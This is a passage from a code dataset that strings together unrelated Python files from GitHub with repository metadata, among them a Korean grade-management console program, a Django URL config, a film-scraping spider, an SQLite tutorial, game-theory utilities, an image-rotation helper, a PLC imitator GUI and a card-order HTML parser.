수강정보\nselected_course=[]\ngrades = {}\nwhile True: #메인메뉴\n print(\"\"\"=============\n 1.학생정보 관리기능\n 2.수강정보 관리기능\n 3.성적정보 관리기능\n 4.기타기능\n 5.종료\n =============\"\"\")\n user_input=int(input(\"원하는 기능을 선택하세요\"))\n if user_input==1: #메인메뉴에서 1번이 선택될경우\n while True:\n print(\"\"\"=============\n 1.학생 추가\n 2.학생 삭제\n 3.학생 확인\n 4.메인메뉴로 돌아가기\n =============\"\"\")\n user_input=int(input(\"원하는 기능을 선택하세요\"))\n if user_input==1: #학생정보 관리기능에서 1번이 선택될경우(\"학생추가\")\n name=input(\"학생의 이름을 입력하세요\")\n number=input(\"학생의 학번을 입력하세요\")\n phone=input(\"학생의 전화번호를 입력하세요\")\n password = input(\"학생의 비밀번호를 입력하세요: \")\n names.append(name)\n numbers.append(number)\n phones.append(phone)\n passwords.append(password)\n \n elif user_input==2: #학생정보 관리기능에서 2번이 선택될경우(\"학생삭제\")\n while True:\n if len(names)==0:\n print(\"등록된 학생이 없습니다\")\n break\n for i in range(len(names)):\n print(i+1,\".\",\" \",names[i],numbers[i],phones[i],course)\n user_input=input(\"삭제할 번호를 입력하세요 (n을 입력하면 뒤로 돌아갑니다): \")\n if user_input == 'n':\n break\n try:\n user_input = int(user_input)\n except ValueError:\n print(\"올바른 번호를 입력하세요.\")\n continue\n user_input -= 1\n if user_input in range(len(names)):\n del names[user_input]\n del numbers[user_input]\n del phones[user_input]\n del passwords[user_input]\n if user_input==10:\n break\n elif user_input == 3: # 학생정보 관리기능에서 3번이 선택될 경우(\"학생확인\")\n while True:\n search_input = input(\"검색할 학생의 학번을 입력하세요: \")\n if search_input in numbers:\n password_input = input(\"비밀번호를 입력하세요: \")\n for i in range(len(names)):\n if search_input in [names[i], numbers[i], passwords[i], course[i]]:\n print(f\"이름: {names[i]}, 학번: {numbers[i]}, 전화번호: {phones[i]}, 수강정보: {course[i]}\")\n found = True\n break \n else:\n print(\"검색 결과가 없거나 비밀번호가 일치하지 않습니다.\")\n break\n \n elif user_input == 4: # 학생정보 관리기능에서 4번이 선택될 경우\n break\n \n elif user_input == 2: # 메인메뉴에서 2번이 선택될 경우\n while True:\n print(\"\"\"=================\n 1. 수강과목 등록\n 2. 수강과목 삭제\n 3. 메인메뉴로 돌아가기\n =========================\"\"\")\n user_input = int(input(\"원하는 기능을 선택하세요: \"))\n\n if user_input == 1: # 수강과목 등록\n while True:\n print(\"학생이 수강하고 있는 과목을 선택하세요\")\n for i in range(len(course)):\n print(\"No. \" + str(i + 1) + \", \" + course[i])\n try:\n selected_subject_index = int(input(\"원하는 과목 번호를 선택하세요: \"))\n if selected_subject_index < 1 or selected_subject_index > len(course):\n print(\"잘못된 입력입니다.\")\n else:\n selected_course.append(course[selected_subject_index - 1])\n choice = input(\"과목 선택이 완료되었습니까? (y/n): \")\n if choice.lower() == \"y\":\n print(\"학생의 수강정보 입력이 완료되었습니다.\")\n break\n except ValueError:\n print(\"잘못된 입력입니다.\")\n\n elif user_input == 2: # 수강과목 삭제\n if len(selected_course) == 0:\n print(\"수강 중인 과목이 없습니다.\")\n else:\n print(\"수강 중인 과목:\")\n for i, subject in enumerate(selected_course, 1):\n print(f\"{i}. {subject}\")\n try:\n selected_subject_index = int(input(\"삭제할 과목 번호를 선택하세요: \"))\n if selected_subject_index < 1 or selected_subject_index > len(selected_course):\n print(\"잘못된 입력입니다.\")\n else:\n deleted_subject = selected_course.pop(selected_subject_index - 1)\n print(f\"{deleted_subject} 과목이 삭제되었습니다.\")\n except ValueError:\n print(\"잘못된 입력입니다.\")\n\n elif user_input == 3: # 메인메뉴로 돌아가기\n break\n \n elif user_input == 3: # 메인메뉴에서 3번이 선택될 경우\n while True:\n print(\"\"\"=============\n 1. 성적입력\n 2. 성적수정\n 3. 성적조회\n 4. 성적통계\n 5. 메인메뉴로 돌아가기\n =============\"\"\")\n \n user_input = int(input(\"원하는 기능을 선택하세요: \"))\n \n if user_input == 1:\n def enter_grades():\n numbers = input(\"학생의 학번을 입력하세요: \")\n print(\"수강 가능한 과목:\")\n for i, subject in enumerate(course, 1):\n print(f\"{i}. {subject}\")\n subject_index = int(input(\"성적을 입력할 과목의 번호를 선택하세요: \")) - 1\n selected_subject = course[subject_index]\n grade = input(\"성적을 입력하세요: \")\n \n if numbers in grades:\n grades[numbers][selected_subject] = grade\n else:\n grades[numbers] = {selected_subject: grade}\n\n print(\"성적이 입력되었습니다.\")\n\n enter_grades()\n\n elif user_input == 2:\n def modify_grades():\n numbers = input(\"학생의 학번을 입력하세요: \")\n course = input(\"과목명을 입력하세요: \")\n\n if numbers in grades and course in grades[numbers]:\n new_grade = input(\"수정할 성적을 입력하세요: \")\n grades[numbers][course] = new_grade\n print(\"성적이 수정되었습니다.\")\n else:\n print(\"입력한 학생의 성적 정보가 존재하지 않습니다.\")\n\n modify_grades()\n\n elif user_input == 3:\n def view_grades():\n numbers = input(\"성적을 조회할 학생의 학번을 입력하세요: \")\n\n if numbers in grades:\n for course, grade in grades[numbers].items():\n print(f\"과목: {course}, 성적: {grade}\")\n else:\n print(\"입력한 학번의 학생의 성적 정보가 존재하지 않습니다.\")\n\n view_grades()\n\n elif user_input == 4:\n def calculate_statistics():\n print(\"수강 가능한 과목:\")\n for i, subject in enumerate(course, 1):\n print(f\"{i}. {subject}\")\n subject_index = int(input(\"성적 통계를 조회할 과목의 번호를 선택하세요: \")) - 1\n selected_subject = course[subject_index]\n\n if selected_subject in course:\n grades_for_course = [float(grade) for student_grades in grades.values() if selected_subject in student_grades for grade in student_grades.values() if grade.isdigit()]\n if grades_for_course:\n average = sum(grades_for_course) / len(grades_for_course)\n maximum = max(grades_for_course)\n minimum = min(grades_for_course)\n \n print(f\"{selected_subject} 과목의 성적 통계:\")\n print(f\"평균: {average}, 최고점: {maximum}, 최저점: {minimum}\")\n \n else:\n print(f\"{selected_subject} 과목의 성적 정보가 존재하지 않습니다.\")\n else:\n print(f\"{selected_subject} 과목은 존재하지 않습니다.\")\n\n calculate_statistics()\n\n elif user_input == 5: # 성적정보 관리기능에서 5번이 선택될 경우\n break # 메인메뉴로 돌아가기\n\n elif user_input == 4: # 메인메뉴에서 4번이 선택될 경우\n print(\"\"\"=============\n 1. 공지사항 등록\n 2. 공지사항 조회\n 3. 공지사항 삭제\n 4. 메인메뉴로 돌아가기\n =============\"\"\")\n user_input = int(input(\"원하는 기능을 선택하세요: \"))\n\n if user_input == 1: # 공지사항 등록\n notice = input(\"등록할 공지사항을 입력하세요: \")\n print(\"공지사항이 등록되었습니다.\")\n\n elif user_input == 2: # 공지사항 조회\n if not notice:\n print(\"등록된 공지사항이 없습니다.\")\n else:\n print(\"등록된 공지사항:\")\n print(notice)\n\n elif user_input == 3: # 공지사항 삭제\n notice = \"\"\n print(\"공지사항이 삭제되었습니다.\")\n\n elif user_input == 4: # 메인메뉴로 돌아가기\n continue\n\n elif user_input == 5: # 메인메뉴에서 5번이 선택될 경우\n print(\"프로그램을 종료합니다.\")\n break\n\nwindow.mainloop()","repo_name":"hawnsoung/grdae-system","sub_path":"성적관리 프로그램.py","file_name":"성적관리 프로그램.py","file_ext":"py","file_size_in_byte":11674,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"22303051687","text":"from django.conf.urls import include, url\nfrom django.views.generic.base import RedirectView\nfrom django.contrib import admin\nfrom rest_framework.authtoken import views as authtoken\nadmin.autodiscover()\n\nfrom stationspinner.settings import DEBUG\n\napp_urls = [\n url(r'^char/', include('stationspinner.character.urls')),\n url(r'^corp/', include('stationspinner.corporation.urls')),\n url(r'^sde/', include('stationspinner.sde.urls')),\n url(r'^evemail/', include('stationspinner.evemail.urls')),\n url(r'^accounting/', include('stationspinner.accounting.urls')),\n url(r'^prices/', include('stationspinner.evecentral.urls')),\n url(r'^statistics/', include('stationspinner.statistics.urls')),\n url(r'^universe/', include('stationspinner.universe.urls')),\n url(r'^grappelli/', include('grappelli.urls')),\n url(r'^auth/', authtoken.obtain_auth_token),\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', RedirectView.as_view(url='/', permanent=True))\n]\n\nif DEBUG:\n urlpatterns = [url(r'^api/', include(app_urls))]\nelse:\n urlpatterns = app_urls\n","repo_name":"kriberg/stationspinner","sub_path":"stationspinner/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"3951562257","text":"import pymongo\nimport scrapy\nimport json\nfrom scrapy.http import Request\nfrom scrapy.utils.project import get_project_settings\nimport re\n\n\ndef first(x):\n if len(x) == 0:\n return ''\n else:\n return x[0]\n\n\n\n\n\nclass GooglePlaySpider(scrapy.Spider):\n name = 'googleplay'\n\n def __init__(self, crawl_type='all', **kwargs):\n super().__init__(**kwargs)\n settings = get_project_settings()\n self.client = pymongo.MongoClient(settings.get('MONGO_URI'))\n self.db = self.client.film\n self.collection = self.db.googleplay\n self.state = 'run'\n self.crawl_type = crawl_type\n\n self.allowed_domains = ['google.com', 'justwatch.com']\n query = 'https://apis.justwatch.com/content/titles/en_PH/popular?body={\"fields\":[\"full_path\"],\"genres\":[\"%s\"],\"providers\":[\"ply\"],\"enable_provider_filter\":false,\"monetization_types\":[],\"page\":1,\"page_size\":3,\"matching_offers_only\":true}&language=en'\n genres = ['act', 'ani', 'cmy', 'crm', 'doc', 'drm', 'eur', 'fml', 'fnt', 'hrr', 'hst', 'msc', 'rly', 'rma',\n 'scf', 'spt', 'trl', 'war', 'wsn']\n self.start_urls = [query % i for i in genres]\n\n # download_delay = 1.5 \n def parse(self, response):\n if self.state == 'run':\n data = json.loads(response.body)\n for item in data.get('items', []):\n yield Request('https://www.justwatch.com%s' % item.get('full_path'), callback=self.parse_justwatch)\n if data['page'] < data['total_pages']:\n yield Request(\n response.url.replace('%22page%22:' + str(data['page']), '%22page%22:' + str(data['page'] + 1)))\n\n def parse_justwatch(self, response):\n url = response.xpath('//*[@alt=\"Google Play Movies\"]/../@href').extract()[0]\n yield Request(url, callback=self.parse_googleplay)\n\n def parse_googleplay(self, response):\n is_duplicated = (len(list(self.collection.find({'url': response.url}, {'_id': 1}))) > 0)\n if is_duplicated:\n if self.crawl_type == 'incremental':\n self.state = 'stop'\n return\n yield {\n 'title': first(response.xpath('//h1//text()').extract()),\n 'url': response.url,\n 'release_year': first(response.xpath('//h1/../div/div/div/span[1]/text()').extract()),\n 'duration': first(response.xpath('//h1/../div/div/div/span[2]//text()').extract()),\n 'genre': first(response.xpath('//a[@itemprop=\"genre\"]/text()').extract()),\n 'description': first(response.xpath('//span[@jsslot]/text()').extract()),\n 'cast': response.xpath('//h2[text()=\"Actors\"]/../div/span/a/span/text()').extract(),\n 'producer': response.xpath('//h2[text()=\"Producers\"]/../div/span/a/span/text()').extract(),\n 'director': response.xpath('//h2[text()=\"Director\"]/../div/span/a/span/text()').extract(),\n 'writer': response.xpath('//h2[text()=\"Writers\"]/../div/span/a/span/text()').extract()\n }\n","repo_name":"vuongnp/data-integration","sub_path":"film/film/spiders/googleplay.py","file_name":"googleplay.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2154090717","text":"import sqlite3\n\nconnection = sqlite3.connect('customer.db') \nc = connection.cursor()\n\ndef LINE():\n print('--------------------')\n\nLINE()#_________________________________________________________________\n\n\n# Print database \n\nc.execute(\"SELECT rowid, * FROM customers\")\n\ncustomer_db = c.fetchall() \n\nfor x in customer_db:\n print(x)\n\nLINE()#_________________________________________________________________\n\n# 9. Update Records\n\nc.execute(\n \"\"\"\n UPDATE customers SET first_name = 'Roderick'\n WHERE last_name = 'Cassar'\n \"\"\"\n)\n\n# reprint\nc.execute('SELECT rowid, * FROM customers')\ncustomer_db = c.fetchall() \n\nfor x in customer_db:\n print(x)\n\n\n# Here we have update a record first_name by selecting with last_name \n# However if here will be multiple records with the same name \n# they all will be changed \n\nLINE()#_________________________________________________________________\n\n# Updating with rowid:\n\nc.execute(\n \"\"\"\n UPDATE customers SET first_name = 'Dorothy'\n WHERE rowid = 4\n\n \"\"\"\n)\n\n# reprint\nc.execute('SELECT rowid, * FROM customers')\ncustomer_db = c.fetchall() \n\nfor x in customer_db:\n print(x)\n\n\nLINE()#_________________________________________________________________\n\n# 10. Delete Records\n\n\nc.execute(\"DELETE FROM customers WHERE rowid = 8\")\n\n# Here we have delete 'Roderick' row 8 from our database\n\n\nc.execute(\"SELECT rowid, * FROM customers\")\ncustomer_db = c.fetchall()\n\nfor x in customer_db:\n print(x)\n \nLINE()#_________________________________________________________________\n\n\nconnection.commit()\nconnection.close()","repo_name":"foxcodenine/tutorials","sub_path":"udemy_courses/Intro_To_SQLite_Databases_for_Python/Using SQLite With Python/db3-updating.py","file_name":"db3-updating.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1224432099","text":"\"\"\"https://www.hackerrank.com/challenges/calendar-module/problem.\"\"\"\nfrom datetime import date\nfrom calendar import day_name, weekday\n\n\ndef find_day_name(m, d, y):\n \"\"\"https://www.hackerrank.com/challenges/calendar-module/problem.\"\"\"\n # Using datetime module\n weekdays = ['MONDAY', 'TUESDAY', 'WEDNESDAY', 'THURSDAY',\n 'FRIDAY', 'SATURDAY', 'SUNDAY']\n print(weekdays[date(y, m, d).weekday()])\n\n # Using calender module\n print(day_name[weekday(y, m, d)])\n\n\nif __name__ == '__main__':\n m, d, y = map(int, input().split())\n find_day_name(m, d, y)\n","repo_name":"bacdoxuan/Hacker_Rank_Python","sub_path":"chap8_Date_time/ex1_find_day.py","file_name":"ex1_find_day.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28626781697","text":"\"\"\"\nFrame Shift Drive\n\"\"\"\nfrom ed_engineer_shopping_list_builder.ship_components.base_component import (\n BaseComponent,\n)\nfrom ed_engineer_shopping_list_builder.classification import Classification\nfrom ed_engineer_shopping_list_builder.modification import Modification\nfrom ed_engineer_shopping_list_builder.effect import ExperimentalEffect\n\n\nclass FrameShiftDrive(BaseComponent):\n \"\"\"\n Frame Shift Drive\n \"\"\"\n\n component_classification = Classification.CORE\n name = \"Frame Shift Drive\"\n\n _modifications = [\n Modification.FASTER_FSD_BOOT_SEQUENCE,\n Modification.INCREASED_FSD_RANGE,\n Modification.SHIELDED_FSD,\n ]\n _effects = [\n ExperimentalEffect.DEEP_CHARGE,\n ExperimentalEffect.MASS_MANAGER,\n ExperimentalEffect.DOUBLE_BRACED,\n ExperimentalEffect.STRIPPED_DOWN,\n ExperimentalEffect.THERMAL_SPREAD,\n ]\n\n _default_modification = Modification.INCREASED_FSD_RANGE\n _default_effect = ExperimentalEffect.MASS_MANAGER\n","repo_name":"ammesonb/ed-engineer-shopping-list-builder","sub_path":"ed_engineer_shopping_list_builder/ship_components/frame_shift_drive.py","file_name":"frame_shift_drive.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2506779477","text":"import numpy as np\nfrom itertools import product\nfrom games.types.equilibrium import PureEq\nfrom games.types.game import Game\nfrom games.types.misc import WelfareGame\nfrom typing import List, Tuple\n\n\nclass BruteNash:\n\n \"\"\"Collection of methods for brute force calculation of Nash equilibrium in noncooperative games.\n \n Attributes:\n TOLERANCE (float): Numerical tolerance for float point comparisons.\n \"\"\"\n \n TOLERANCE = 10**-8\n\n @staticmethod\n def game_to_payoffs(game: Game) -> List[np.ndarray]:\n \"\"\"Turn a noncooperative game into strategic form through calculation of payoff arrays.\n \n Args:\n game (Game): Noncooperative game, all players must have a finite number of actioms.\n \n Returns:\n List[np.ndarray]: List of payoff arrays defining the game.\n \"\"\"\n num_act = [len(ac) for ac in game.actions]\n payoffs = [None]*game.N\n for i, player in enumerate(game.players):\n payoff_i = np.zeros(num_act)\n # generate all possible types of action indices\n for a in product(*[range(n_i) for n_i in num_act]):\n payoff_i[a] = game.U_i(i, a)\n payoffs[i] = payoff_i\n return payoffs\n\n @classmethod\n def find_NCnash(cls, game: Game, add=True) -> List[PureEq]:\n \"\"\"Find nash equilibrium of a specified noncooperative game through brute force search.\n \n Args:\n game (Game): Noncooperative Game with finite action sets.\n add (bool, optional): Whether to add the calculated equilibrium to Game.eq member.\n \n Returns:\n List[PureEq]: List of calculated Nash equilibrium.\n \"\"\"\n eq = find_nash(cls.game_to_payoffs(game))\n if add:\n game.eq += eq\n return eq\n\n @classmethod\n def find_nash(cls, payoffs: List[np.ndarray]) -> List[PureEq]:\n \"\"\"Find nash equilibrium of specified list of payoff matrices through brute force search.\n \n Args:\n payoffs (List[np.ndarray]): List of payoff arrays defining the utilities of the game.\n \n Returns:\n List[PureEq]: List of calculated Nash equilibrium.\n \"\"\"\n cpnes = list(np.argwhere(payoffs[0] > np.amax(payoffs[0], 0) - cls.TOLERANCE))\n cpnes = [tuple(cpne) for cpne in cpnes]\n N = len(payoffs)\n \n for i in range(1, N):\n pm = payoffs[i]\n for cpne in cpnes[:]:\n ind = cpne[:i] + (slice(None),) + cpne[i+1:]\n if pm[cpne] < np.max(pm[ind]) - cls.TOLERANCE:\n cpnes.pop(cpnes.index(cpne))\n \n return [PureEq(cpne) for cpne in cpnes]\n\n\nclass BrutePoA:\n\n \"\"\"Collection of methods used for calculating price of anarchy/stability.\n We use the designation PoA = min (welfare of pne / welfare of optimal) over all pne\n and PoS = max (welfare of pne / welfare of optimal) over all pne.\n \"\"\"\n \n @staticmethod\n def game_to_welfare(game: WelfareGame) -> np.ndarray:\n \"\"\"Retrieve the Welfare matrix from a Welfare Game.\n \n Args:\n game (WelfareGame): Welfare Game, all players must have a finite action set.\n \n Returns:\n np.ndarray: Welfare matrix.\n \"\"\"\n num_act = [len(ac) for ac in game.actions]\n welfare = np.zeros(num_act)\n # generate all possible types of action indices\n for a in product(*[range(n_i) for n_i in num_act]):\n welfare[a] = game.welfare(a)\n return welfare\n\n @staticmethod\n def set_poas(list_pureeq: List[PureEq], welfare: np.ndarray) -> Tuple[float, float]:\n \"\"\"Get price of anarchy and prince of stability based on the list of pure equilibrium of the game.\n \n Args:\n list_pureeq (List[PureEq]): List of pure equilibria of the given game\n welfare (np.ndarray): Welfare matrix of the game.\n \n Returns:\n Tuple[float, float]: PoA, PoS\n \"\"\"\n pne_welfare = [welfare[tuple(pne.play)] for pne in list_pureeq]\n opt = np.max(welfare)\n price_ratios = [float(pne)/opt for pne in pne_welfare]\n return min(price_ratios), max(price_ratios)\n\n @staticmethod\n def get_argopt(welfare: np.ndarray) -> Tuple[int, ...]: \n \"\"\"get index of where maximum is attained for a welfare matrix.\n \n Args:\n welfare (np.ndarray): Welfare matrix.\n \n Returns:\n Tuple[int, ...]: An index where maximum is attained (may not be unique though).\n \"\"\"\n return np.unravel_index(np.argmax(welfare), welfare.shape)\n","repo_name":"rohit-konda/Games","sub_path":"games/analysis/search_nash.py","file_name":"search_nash.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5707177298","text":"import cv2 as cv\nimport numpy as np\n\ndef rotate_along_axis(img, theta=0, phi=0, gamma=0, dx=0, dy=0, dz=0):\n \n height, width = img.shape[:2]\n # get radius of rotation along 3 axis\n rtheta, rphi, rgamma = get_rad(theta, phi, gamma)\n \n # get ideal focal length on z axis\n # NOTE: Change this section to other axis if needed\n d = np.hypot(height, width)\n focal = d / (2 * np.sin(rgamma) if np.sin(rgamma) != 0 else 1)\n dz = focal\n\n # get projection matrix\n mat = get_M(img, focal, rtheta, rphi, rgamma, dx, dy, dz)\n \n return cv.warpPerspective(img.copy(), mat, (width, height))\n\n\ndef get_M(img, focal, theta, phi, gamma, dx, dy, dz):\n \n h, w = img.shape[:2]\n f = focal\n\n # Projection 2D -> 3D matrix\n A1 = np.array([ [1, 0, -w/2],\n [0, 1, -h/2],\n [0, 0, 1],\n [0, 0, 1]])\n \n # Rotation matrices around the X, Y, and Z axis\n RX = np.array([ [1, 0, 0, 0],\n [0, np.cos(theta), -np.sin(theta), 0],\n [0, np.sin(theta), np.cos(theta), 0],\n [0, 0, 0, 1]])\n \n RY = np.array([ [np.cos(phi), 0, -np.sin(phi), 0],\n [0, 1, 0, 0],\n [np.sin(phi), 0, np.cos(phi), 0],\n [0, 0, 0, 1]])\n \n RZ = np.array([ [np.cos(gamma), -np.sin(gamma), 0, 0],\n [np.sin(gamma), np.cos(gamma), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]])\n\n # Composed rotation matrix with (RX, RY, RZ)\n R = np.dot(np.dot(RX, RY), RZ)\n\n # Translation matrix\n T = np.array([ [1, 0, 0, dx],\n [0, 1, 0, dy],\n [0, 0, 1, dz],\n [0, 0, 0, 1]])\n\n # Projection 3D -> 2D matrix\n A2 = np.array([ [f, 0, w/2, 0],\n [0, f, h/2, 0],\n [0, 0, 1, 0]])\n\n # Final transformation matrix\n return np.dot(A2, np.dot(T, np.dot(R, A1)))\n\n\ndef get_rad(theta, phi, gamma):\n return np.deg2rad(theta), np.deg2rad(phi), np.deg2rad(gamma)\n","repo_name":"RezaFirouzii/fum-delta-vision","sub_path":"transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10289573384","text":"import os\nfrom glob import glob\nfrom torch.utils import data\nfrom PIL import Image\nfrom torchvision import transforms\n\nclass CustomDataset(data.Dataset):\n def __init__(self, folder, num_data, args):\n super().__init__()\n\n self.direction = args.direction\n self.edges_and_images = list()\n\n assert len(folder)\n for data_folder in folder:\n assert os.path.exists(data_folder)\n components = os.path.normpath(data_folder).split(os.sep)\n\n if any([f in [\"edges2shoes\", \"edges2handbags\"] for f in components]):\n self.edges_and_images += \\\n [(path, self._getABImageData) for path in sorted(glob(os.path.join(data_folder, \"*.jpg\")))]\n \n elif any([f in [\"lhq_256\", \"kaggle_landscape\"] for f in components]):\n assert sorted(glob(os.path.join(data_folder, \"*s\"))) == \\\n [os.path.join(data_folder, \"edges\"), os.path.join(data_folder, \"images\")]\n self.edges_and_images += \\\n [((edges, image), self._getImageEdgeData) for edges, image in zip(\n sorted(glob(os.path.join(data_folder, \"edges\", \"*.jpg\"))),\n sorted(glob(os.path.join(data_folder, \"images\", \"*.jpg\")))\n )]\n\n if num_data != -1:\n self.edges_and_images = self.edges_and_images[:num_data]\n \n self.transform = transforms.Compose([\n transforms.Resize(args.load_size),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\n\n def __len__(self):\n return len(self.edges_and_images)\n\n def __getitem__(self, index):\n path, process_fn = self.edges_and_images[index]\n return process_fn(path)\n\n def _getABImageData(self, path):\n # read image from path\n AB = Image.open(path).convert('RGB')\n # split AB image into A and B\n w, h = AB.size\n w2 = int(w / 2)\n edge = AB.crop((0, 0, w2, h))\n image = AB.crop((w2, 0, w, h))\n return {\n 'A': self.transform(edge), \n 'B': self.transform(image),\n 'A_path': path\n } if self.direction == 'AtoB' else {\n 'A': self.transform(image), \n 'B': self.transform(edge),\n 'A_path': path\n }\n\n def _getImageEdgeData(self, path):\n pathe, pathi = path\n edge = Image.open(pathe).convert('RGB')\n image = Image.open(pathi).convert('RGB')\n return {\n 'A': self.transform(edge), \n 'B': self.transform(image),\n 'A_path': pathe\n } if self.direction == 'AtoB' else {\n 'A': self.transform(image), \n 'B': self.transform(edge),\n 'A_path': pathi\n }\n","repo_name":"bruceli-rw0/edge2pic-generation","sub_path":"generator/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1931942532","text":"import sys\nfrom pyqtgraph.Qt import QtGui, QtCore, QtWidgets\nimport pyqtgraph as pg\n# from communication import Communication\nfrom data_base import data_base\n# from PyQt5.QtWidgets import QPushButton\nfrom graphs.graph_gpk import graph_gpk\nfrom graphs.value_gpk import value_gpk\nfrom connect_to_PLC import ConnectPLC\nfrom model_NV import ModelNV\nfrom settings import *\n\npg.setConfigOption('background', (33, 33, 33))\npg.setConfigOption('foreground', (197, 198, 199))\n# Interface variables\napp = QtWidgets.QApplication(sys.argv)\nview = pg.GraphicsView()\nLayout = pg.GraphicsLayout()\nview.setCentralItem(Layout)\nview.show()\n# view.setWinowTitle('Imitator')\nview.resize(*RES_IMITATOR)\n\n# declare object for serial Communication\n# ser = Communication()\n# declare object for storage in CSV\ndata_base = data_base()\n# Fonts for text items\nfont = QtGui.QFont()\nfont.setPixelSize(FONT_SIZE)\n\n# buttons style\nstyle = \"background-color:rgb(29, 185, 84);color:rgb(0,0,0);font-size:14px;\"\n\n# Declare graphs\n# Button 1\nproxy = QtWidgets.QGraphicsProxyWidget()\nsave_button = QtWidgets.QPushButton('Start storage')\nsave_button.setStyleSheet(style)\nsave_button.clicked.connect(data_base.start)\nproxy.setWidget(save_button)\n\n# Button 2\nproxy2 = QtWidgets.QGraphicsProxyWidget()\nend_save_button = QtWidgets.QPushButton('Stop storage')\nend_save_button.setStyleSheet(style)\nend_save_button.clicked.connect(data_base.stop)\nproxy2.setWidget(end_save_button)\n\n# Graphs\ngpk_0 = graph_gpk(title='Первый датчик', pen='r')\ngpk_1 = graph_gpk(title='Второй датчик', pen='b')\ngpk_2 = graph_gpk(title='Третий датчик', pen='g')\nprs_cur_grath = graph_gpk(title='Медиана', pen='g')\ngpk_value_0 = value_gpk(color='r', font=font, title='Первый датчик')\ngpk_value_1 = value_gpk(color='b', font=font, title='Второй датчик')\ngpk_value_2 = value_gpk(color='g', font=font, title='Третий датчик')\nprs_cur = graph_gpk(color='g', font=font, title='Медиана из PLC')\n\n## Setting the graphs in the layout \n# Title at top\ntext = \"\"\"My Imitator\"\"\"\n# Layout.addLabel(text, col=1, colspan=21, font=font)\nLayout.addLabel(text, colspan=100, font=font)\nLayout.nextRow()\n\n# Put vertical label on left side\nLayout.addLabel('Давление в ГПК(кг/см²).', angle=-90, rowspan=3)\nLayout.nextRow()\n\n# lb = Layout.addLayout(colspan=21)\n# lb.addItem(proxy)\n# lb.nextCol()\n# lb.addItem(proxy2)\n\n# Layout.nextRow()\n\n# First column\nl1 = Layout.addLayout(colspan=20, rowspan=2)\nl1.addItem(gpk_0)\nl1.nextRow()\nl1.addItem(gpk_1)\nl1.nextRow()\nl1.addItem(gpk_2)\n\n# Second column\nl2 = Layout.addLayout(border=(83, 83, 83))\nl2.addItem(gpk_value_0)\nl2.nextRow()\nl2.addItem(gpk_value_1)\nl2.nextRow()\nl2.addItem(gpk_value_2)\n\n# Third column\nl3 = Layout.addLayout(colspan=20, rowspan=2)\nl3.addItem(prs_cur_grath)\nl3.nextRow()\n\n# Fourth column\nl4 = Layout.addLayout()\nl4.addItem(prs_cur)\nl4.nextRow()\n\n# Time\n# l2 = Layout.addLayout(border=(83, 83, 83))\n# l2.addItem(time)\n\nmodel = ModelNV()\n\n# you have to put the position of the CSV stored in the value_chain list\n# that represent the date you want to visualize\ndef update():\n try:\n # init value imitator\n data = model.get_data_to_PLC()\n pressure = data[:3]\n data_to_PLC = data[:4]\n for i in range(3):\n data_to_PLC[i] = data_to_PLC[i] * 100\n print(pressure, \"to grath\")\n \n c.write_to_PLC(data_to_PLC)\n pr= c.read_PLC()\n \n gpk_0.update(pressure[0])\n gpk_1.update(pressure[1])\n gpk_2.update(pressure[2])\n prs_cur_grath.update(pr)\n gpk_value_0.update(pressure[0])\n gpk_value_1.update(pressure[1])\n gpk_value_2.update(pressure[2])\n prs_cur.update(pr)\n \n except IndexError:\n print('starting, please wait a moment')\n\nc = ConnectPLC()\n\n# if(ser.isOpen()) or (ser.dummyMode()):\n# if True:\nif True:\n timer = pg.QtCore.QTimer()\n timer.timeout.connect(update)\n timer.start(TIME_MAIN)\n\nelse:\n print(\"something is wrong with the update call\")\n# Start Qt event loop unless running in interactive mode.\n\nif __name__ == '__main__':\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtWidgets.QApplication.instance().exec_()\n","repo_name":"sanjas12/02_TG_naladka","sub_path":"NV_4/old/gui_imitator_first.py","file_name":"gui_imitator_first.py","file_ext":"py","file_size_in_byte":4284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43488690067","text":"import os\nfrom dotenv import load_dotenv\nfrom bs4 import BeautifulSoup\n\ndef get_ck_data():\n data = {\n # \"Order Date\": [],\n \"Card Name\": [],\n \"Card Set\": [],\n \"Card Purchase Price\": [],\n \"Card Current Price\": []\n }\n\n directory = \"/Users/angel/Documents/Python Projects/TCG Investment Tracker /order history/cardkingdom\"\n # loop through file directory for .html files\n for filename in os.listdir(directory):\n if '.html' not in filename:\n continue\n\n # grab path to html file\n file_path = os.path.join(directory, filename)\n with open(file_path, 'r') as file:\n html_content = file.read()\n\n # bs4 html parser\n soup = BeautifulSoup(html_content, 'html.parser')\n\n # find div that contains the order list\n order_wrapper = soup.find('div', class_=\"invoiceListWrapper\")\n \n # find all the tr elemnts containing all details each\n singles_lists = order_wrapper.findAll('tr', valign='top')\n\n # go through each tr, note: there are more than there are cards\n for single in singles_lists:\n details = single.findAll('td')\n \n # check the class attr and make sure it contains a 